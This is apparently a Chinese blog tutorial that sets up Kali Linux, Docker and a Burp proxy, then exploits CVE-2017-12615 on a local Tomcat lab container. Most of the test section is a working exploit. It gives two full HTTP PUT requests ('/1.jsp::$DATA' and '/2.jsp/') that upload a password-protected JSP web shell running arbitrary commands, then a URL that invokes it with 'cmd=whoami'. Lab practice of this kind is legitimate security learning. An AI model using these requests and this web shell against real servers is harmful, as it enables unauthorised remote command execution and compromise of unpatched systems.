kali系統安裝和CVE-2017-12615測試
阿新 • • 發佈:2022-05-09
1 安裝kali系統
1.1 下載VMware壓縮包
kali-linux-2022.1
預設的使用者和密碼是kali
1.2 初始化系統
sudo apt update -y #kali
sudo apt install -y sogoupinyin fcitx
sudo dpkg-reconfigure locales #新增[x] zh_CN.UTF-8 UTF-8
sudo reboot
1.3 安裝docker
vim /etc/apt/sources.list.d/docker.list deb [arch=amd64] https://download.docker.com/linux/debian buster stable sudo apt update -y sudo apt install -y docker-ce
1.4 安裝docker-compse
sudo apt install -y docker-compose
2 配置burp代理
2.1 在應用程式那裡找到burpite
2.2 proxy->options中新增代理
2.3 瀏覽器->新增proxy中寫burp開啟的代理
2.4 瀏覽器新增burp的證書
3 配置CVE-2017-12615環境
sudo docker run -it -p 8080:8080 cved/cve-2017-12615 bash #kali root@cac77cc04871:/usr/local/tomcat# bin/catalina.sh start #這裡暫時不要關閉視窗
4 測試
先用瀏覽器訪問
firefox http://127.0.0.1:8080
在brup中找到http proyx中找歷史資訊,確認代理是否生效
然後開啟brup的repeater編輯request
PUT /1.jsp::$DATA HTTP/1.1 Host: 192.168.144.128:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 659 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%> ------------------------------------------------------------------------------------------------------- PUT /2.jsp/ HTTP/1.1 Host: 192.168.144.128:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 664 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
傳送請求
http://127.0.0.1:8080/2.jsp?cmd=whoami&password=023 #正常就返回系統使用者了